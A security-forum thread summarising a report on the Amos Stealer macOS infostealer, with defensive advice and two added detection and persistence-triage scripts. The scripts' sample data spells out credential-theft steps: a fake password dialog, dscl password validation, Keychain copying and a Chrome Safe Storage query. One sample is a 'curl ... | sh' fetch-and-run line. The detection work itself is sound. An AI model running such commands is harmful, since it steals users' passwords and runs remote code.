Malware News Amos Stealer Targets macOS Keychain Files and Browser Passwords

Brownie2019
Thread author
Mar 9, 2019
Germany
Amos Stealer targets macOS users through fake downloads, stealing Keychain files, browser passwords, cookies, and developer configs for data theft.
Amos Stealer, an information-stealing malware, is targeting Apple Mac computers to steal private data, according to new details from cybersecurity research firm CyberProof. Threat actors are reportedly using this malware family to run financially motivated campaigns by compromising macOS environments.

Although Amos Stealer is not new, in the latest campaign the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures.

Once inside a Mac, it searches for valuable files across system directories. It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.

Silent Download Methods
This kind of macOS “fake download” distribution is a common way infostealers get in, and the impact can be serious because saved browser sessions/cookies can let attackers access accounts even without the password.

What this means in practice
  • Stealing Keychain data, browser passwords, and cookies can lead to account takeover, not just “data theft.”
  • Developer-related files/configs (when targeted) can be used for follow-on compromise (for example, accessing code repos, signing keys, CI/CD tokens, or cloud credentials) depending on what’s present on the Mac.
  • Fake installers and lookalike websites are often the initial entry point, so prevention is heavily about download hygiene and macOS protections.

Low-risk defenses that help most macOS users
  • Install software only from the Mac App Store or the vendor’s official site (avoid “cracked,” “repacked,” and download-portal installers).
  • Keep macOS and browsers fully updated (many campaigns rely on users running older builds).
  • Leave Gatekeeper on, and be cautious with “Open Anyway” overrides for unsigned/unnotarized apps.
  • Use a password manager and enable 2FA/FIDO2 security keys where possible; don’t rely on browser-saved passwords for important accounts.
  • Review and remove unknown browser extensions (Chrome/Edge), especially ones installed “recently” or without a clear publisher.

If you suspect you ran a fake installer (safe next steps)
  • Disconnect from the network (reduces further exfiltration) and stop using the device for sensitive logins until checks are done.
  • Run a scan with a reputable macOS security product (well-known options include Malwarebytes for Mac, Bitdefender, ESET, or similar). No scanner is perfect, but it’s a good first pass.
  • Change passwords from a known-clean device, starting with email, Apple ID, password manager, and financial accounts; revoke active sessions/tokens where the service supports it.
  • Rotate any developer/API credentials that might have been stored locally (GitHub/GitLab tokens, SSH keys, cloud access keys, etc.).
  • Check macOS persistence points (remove only what you’re confident is unwanted): Login Items, LaunchAgents/LaunchDaemons, Profiles/MDM configuration profiles, and unusual background items.

Sharing IOCs safely
If the thread is collecting indicators (filenames, hashes, domains), the safest approach is to upload the suspicious installer/sample to VirusTotal and share the link/results, rather than relying on a single AV alert or assumptions about “safe vs malicious.”

Sources

  • Apple: Open a Mac app from an unidentified developer (Gatekeeper): https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac
  • Apple Platform Security: Protecting against malware (XProtect/MRT concepts): https://support.apple.com/guide/security/protecting-against-malware-sec469d47bd8/web
  • Hackread: https://hackread.com/amos-stealer-macos-keychain-files-browser-passwords/
 
Here's the original report from CyberProof:


What I don't get is: the infostealer steals the encrypted keychain database file — but how do they decrypt it? There's no mention of a keylogger, and no mention of a memory dump.

It turns out the different campaigns steal passwords via different mechanisms — including realistic dialog prompts and command-line "validation."
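Detection logic for the credential-theft chain discussed above (fake password dialog, command-line "validation", Keychain and browser-store collection), run over constructed process-execution events. This is an added example, not code from the post or from CyberProof. The specific command-line patterns it looks for (an osascript "display dialog ... with hidden answer" prompt, validating the typed password with `dscl ... -authonly`, copying login.keychain-db, querying the `security` CLI, collecting Chrome/Edge Cookies and Login Data files) are the editor's assumptions about how such campaigns behave, not facts stated on this page; the event format, user names, timestamps and paths are all constructed.

```python
"""
Rule-based detection for an infostealer credential-theft chain on macOS,
exercised against constructed process-execution events.
Added example; the command-line patterns below are assumptions about typical
campaign behaviour, not indicators from the thread or the CyberProof report.
"""
import re
from datetime import datetime, timedelta

# (rule name, regex applied to the full command line)
RULES = [
    ("fake_password_prompt",
     re.compile(r"display dialog.*(with hidden answer|password)", re.I)),
    ("local_password_validation",
     re.compile(r"\bdscl\b.*-authonly")),
    ("keychain_file_access",
     re.compile(r"Library/Keychains/login\.keychain-db")),
    ("keychain_cli_query",
     re.compile(r"\bsecurity\b.*\b(dump-keychain|find-generic-password|find-internet-password)\b")),
    ("browser_store_collection",
     re.compile(r"(Google/Chrome|Microsoft Edge).*(Cookies|Login Data)")),
]

# Constructed events in a generic EDR-export shape; not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T09:00:00", "user": "alice", "process": "osascript",
     "cmdline": "osascript -e 'display dialog \"macOS needs your password to continue\" "
                "default answer \"\" with hidden answer'"},
    {"ts": "2024-05-01T09:00:05", "user": "alice", "process": "dscl",
     "cmdline": "dscl /Local/Default -authonly alice [redacted]"},
    {"ts": "2024-05-01T09:00:40", "user": "alice", "process": "cp",
     "cmdline": "cp /Users/alice/Library/Keychains/login.keychain-db /tmp/.k/login.keychain-db"},
    {"ts": "2024-05-01T09:01:10", "user": "alice", "process": "security",
     "cmdline": "security find-generic-password -ga 'Chrome Safe Storage'"},
    {"ts": "2024-05-01T09:02:00", "user": "alice", "process": "zip",
     "cmdline": "zip -r /tmp/.k/out.zip '/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies'"},
    # benign activity that must not fire
    {"ts": "2024-05-01T09:03:00", "user": "alice", "process": "osascript",
     "cmdline": "osascript -e 'display notification \"Build finished\"'"},
    {"ts": "2024-05-01T11:30:00", "user": "bob", "process": "cp",
     "cmdline": "cp /Users/bob/Documents/report.pdf /tmp/"},
]


def detect(events):
    """Apply each rule to each event; return one hit per (event, rule) match."""
    hits = []
    for event in events:
        for name, pattern in RULES:
            if pattern.search(event["cmdline"]):
                hits.append({"ts": datetime.fromisoformat(event["ts"]),
                             "user": event["user"], "rule": name,
                             "cmdline": event["cmdline"]})
    return hits


def correlate(hits, window=timedelta(minutes=10), min_rules=2):
    """Per user, find the largest set of distinct rules firing inside `window`.

    One rule on its own (an admin running `security`, a build script calling
    osascript) is noise; several stages of the chain from the same user within
    minutes is the alert-worthy condition. Returns {user: sorted rule names}.
    """
    by_user = {}
    for hit in sorted(hits, key=lambda h: h["ts"]):
        by_user.setdefault(hit["user"], []).append(hit)
    alerts = {}
    for user, user_hits in by_user.items():
        best = set()
        for i, start in enumerate(user_hits):
            in_window = {h["rule"] for h in user_hits[i:] if h["ts"] - start["ts"] <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_rules:
            alerts[user] = sorted(best)
    return alerts


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"{hit['ts']} {hit['user']:6} {hit['rule']:28} {hit['cmdline'][:70]}")
    print(correlate(detect(SAMPLE_EVENTS)))
```

Run as-is to see the five hits for "alice" and the correlated alert; "bob" and the notification-only osascript call produce nothing. The correlation step is what keeps this usable: each individual rule will fire on legitimate admin or developer activity, so alert on the chain, not on the single command.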
 
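For the "check macOS persistence points" step in the remediation list above, here is a small triage script for the launchd locations (LaunchAgents/LaunchDaemons). It is an added example, not code from the post or from CyberProof, and the heuristics it applies (payloads staged under temp paths, executables hidden in a user's Library folder, "com.apple.*" labels pointing outside Apple paths, interpreter or curl one-liners) are the editor's assumptions about how droppers typically persist, not indicators from this thread. The `demo()` function runs the same logic against constructed sample plists so it can be exercised on any machine; user names, paths and labels in those samples are made up.

```python
"""
Triage macOS launchd persistence (LaunchAgents/LaunchDaemons) for signs of a
dropped agent. Added example, not code from the forum post or CyberProof.
Heuristics (staging paths, Apple-looking labels, interpreter one-liners) are
assumptions about typical droppers, not indicators from the page.
Run with no arguments on a Mac to scan the real directories; `demo()` runs
against constructed sample plists so the logic can be exercised anywhere.
"""
import plistlib
import tempfile
from pathlib import Path

# Paths Apple's own signed content lives under (assumption: a "com.apple.*"
# label whose executable is elsewhere is worth a manual look).
APPLE_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
# Throwaway locations droppers commonly stage payloads in (assumption).
STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
# Interpreter / download-helper fragments that rarely belong in a launch agent.
INTERPRETER_TOKENS = ("osascript", "curl ", "bash -c", "sh -c", "base64 -d")


def assess(plist):
    """Return the reasons a launchd plist looks suspicious (empty if none)."""
    reasons = []
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])] or [str(plist.get("Program", ""))]
    exe, cmdline = args[0], " ".join(args)
    for arg in args:
        if arg.startswith(STAGING_PREFIXES):
            reasons.append(f"references staging path: {arg}")
    if exe.startswith("/Users/") and "/Library/" in exe:
        reasons.append(f"executable hidden in a user Library folder: {exe}")
    if label.startswith("com.apple.") and not exe.startswith(APPLE_PREFIXES):
        reasons.append(f"Apple-style label {label!r} but executable outside Apple paths: {exe}")
    for token in INTERPRETER_TOKENS:
        if token in cmdline:
            reasons.append(f"interpreter/download helper in command line: {token.strip()}")
    if reasons and plist.get("RunAtLoad"):
        reasons.append("RunAtLoad is true (executes at login/boot)")
    return reasons


def scan(directories):
    """Parse every *.plist in the given directories; return [(path, reasons)]."""
    findings = []
    for directory in directories:
        for path in sorted(Path(directory).glob("*.plist")):
            try:
                with open(path, "rb") as fh:
                    plist = plistlib.load(fh)
            except Exception as exc:  # malformed or non-plist file: still report it
                findings.append((str(path), [f"unparseable plist: {exc}"]))
                continue
            reasons = assess(plist)
            if reasons:
                findings.append((str(path), reasons))
    return findings


def default_directories():
    """The launchd locations to check on a real Mac (only those that exist)."""
    candidates = [Path.home() / "Library/LaunchAgents",
                  Path("/Library/LaunchAgents"), Path("/Library/LaunchDaemons")]
    return [p for p in candidates if p.is_dir()]


def write_samples(directory):
    """Constructed sample plists (not real indicators) for a dry run."""
    samples = {
        "com.example.updater.plist": {       # legitimate-looking vendor agent
            "Label": "com.example.updater",
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
            "RunAtLoad": True,
        },
        "com.apple.systemhelper.plist": {    # Apple-style label, hidden user-Library binary
            "Label": "com.apple.systemhelper",
            "ProgramArguments": ["/Users/alice/Library/Application Support/.sys/helper", "-r"],
            "RunAtLoad": True,
        },
        "com.example.sync.plist": {          # shell one-liner that fetches and runs code
            "Label": "com.example.sync",
            "ProgramArguments": ["/bin/sh", "-c", "curl -s http://example.invalid/p | sh"],
        },
    }
    for name, content in samples.items():
        with open(Path(directory) / name, "wb") as fh:
            plistlib.dump(content, fh)


def demo():
    """Scan the constructed samples; returns {filename: reasons} for flagged files."""
    with tempfile.TemporaryDirectory() as tmp:
        write_samples(tmp)
        return {Path(path).name: reasons for path, reasons in scan([tmp])}


if __name__ == "__main__":
    results = scan(default_directories()) or [("(no findings)", [])]
    for path, reasons in results:
        print(path)
        for reason in reasons:
            print("   -", reason)
```

The script only reports; it removes nothing, in line with the "remove only what you're confident is unwanted" advice. Login Items, configuration profiles and background items added through newer macOS mechanisms are not covered by the launchd directories and still need a manual look in System Settings.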